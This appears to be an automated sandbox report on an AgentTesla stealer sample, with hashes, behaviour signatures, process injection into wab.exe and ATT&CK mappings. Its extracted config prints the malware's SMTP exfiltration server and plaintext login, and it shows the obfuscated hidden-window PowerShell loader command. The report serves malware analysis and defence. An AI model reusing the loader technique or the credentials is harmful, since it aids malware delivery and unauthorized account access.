agenttesla | 85efb78f902d1befca94b2e9b0b7223c4e320e409e21b5b029a88ebce5587b46

Analysis

max time kernel
147s
max time network
134s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
24-06-2024 11:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

doc20240624-00073.exe
Size

623KB
MD5

43970c342a6f6849918eff777d391439
SHA1

58a9e9e70a97dc454e5462259a90709c8df789f6
SHA256

9a46488fbf68e28b2f3e84183fe6100ad7b0a0f72628ca90f02de0b05a8ff5fc
SHA512

e6ab83f9431d3baa50201947a06851f5b74916b48b64d068cddb453c5addc9b7cf39d1246d83d70fc18fadb46c854f6c22535d42a080ee9d624ff9fb30104200
SSDEEP

6144:Z4SUjhtcUB6uitM/DOfM1PzrgFswogtKxaqcYe29nOAw3YLS/KSGBG9xNG1E:CilWLe+P0swbEXcX2NOAK/KH8NGC

Score

10^/10

agenttesla execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
cpanel17.rackforest.com
Port:
587
Username:
[email protected]
Password:
boygirl123456
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2556 powershell.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2372 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2556 powershell.exe
2372 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2556 set thread context of 2372 2556 powershell.exe wab.exe

pid	process
2556	powershell.exe

flow	ioc
10	ip-api.com

pid	process
2372	wab.exe

pid	process
2556	powershell.exe
2372	wab.exe

description	pid	process	target process
PID 2556 set thread context of 2372	2556	powershell.exe	wab.exe

Drops file in Windows directory 2 IoCs

Processes:

doc20240624-00073.exe

description	ioc	process
File opened for modification	C:\Windows\Fonts\Impeccability29\Saxten.luc	doc20240624-00073.exe
File opened for modification	C:\Windows\resources\Strmpeskafterne\Tortrix.ini	doc20240624-00073.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exewab.exe

pid process

2556 powershell.exe
2556 powershell.exe
2556 powershell.exe
2556 powershell.exe
2556 powershell.exe
2556 powershell.exe
2556 powershell.exe
2556 powershell.exe
2372 wab.exe
2372 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2556 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2556 powershell.exe
Token: SeDebugPrivilege 2372 wab.exe

pid	process
2556	powershell.exe
2556	powershell.exe
2556	powershell.exe
2556	powershell.exe
2556	powershell.exe
2556	powershell.exe
2556	powershell.exe
2556	powershell.exe
2372	wab.exe
2372	wab.exe

pid	process
2556	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	2372	wab.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

doc20240624-00073.exepowershell.exe

description	pid	process	target process
PID 2964 wrote to memory of 2556	2964	doc20240624-00073.exe	powershell.exe
PID 2964 wrote to memory of 2556	2964	doc20240624-00073.exe	powershell.exe
PID 2964 wrote to memory of 2556	2964	doc20240624-00073.exe	powershell.exe
PID 2964 wrote to memory of 2556	2964	doc20240624-00073.exe	powershell.exe
PID 2556 wrote to memory of 2372	2556	powershell.exe	wab.exe
PID 2556 wrote to memory of 2372	2556	powershell.exe	wab.exe
PID 2556 wrote to memory of 2372	2556	powershell.exe	wab.exe
PID 2556 wrote to memory of 2372	2556	powershell.exe	wab.exe
PID 2556 wrote to memory of 2372	2556	powershell.exe	wab.exe
PID 2556 wrote to memory of 2372	2556	powershell.exe	wab.exe

C:\Users\Admin\AppData\Local\Temp\doc20240624-00073.exe
"C:\Users\Admin\AppData\Local\Temp\doc20240624-00073.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Egebjergs=Get-Content 'C:\Users\Admin\AppData\Local\cardioparplasis\navnlse\Salomes.Ord';$Tergant254=$Egebjergs.SubString(50482,3);.$Tergant254($Egebjergs)"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\cardioparplasis\navnlse\Pipetting.bla
Filesize
323KB

MD5
a4f70a014d8973f08700e2ee02cd565e

SHA1
cf484471a00a331264a810a6b4b9945f56d3ec58

SHA256
9953bb9da1b287b48eaa39be1e23f510dd49f13fed83a95f0b470de8f8dd8220

SHA512
a09212a0b602ece3eb7b9209b189dfb0a138c428bbb5acf645fce1a4ebb2af6a0908de32d2cd16061f89f92163281f77e7b6bc54fed2a88c00518fc27070f6f9

Download Submit
C:\Users\Admin\AppData\Local\cardioparplasis\navnlse\Salomes.Ord
Filesize
49KB

MD5
d4967d4847a0f4364f49c4724bf309b6

SHA1
2c1eb423b2e150b7c25ab03549eb903b645f2481

SHA256
27abbbba12f54d62ab075cd90263e61cc47e03c8c4f4555644843b9f3182da0f

SHA512
63ad7d1ef9d3487f66fb8c05abe30bce0cd5f9558d0db709c387225f8686701fadfe1b528031792689f58c91dd722184a4ca2ee50756866ccb133d0b68e79b76

Download Submit
memory/2372-32-0x0000000000BA0000-0x0000000001C02000-memory.dmp

Filesize
16.4MB

Download
memory/2372-33-0x0000000000BA0000-0x0000000000BE2000-memory.dmp

Filesize
264KB

Download
memory/2556-16-0x0000000006640000-0x00000000071B6000-memory.dmp

Filesize
11.5MB

Download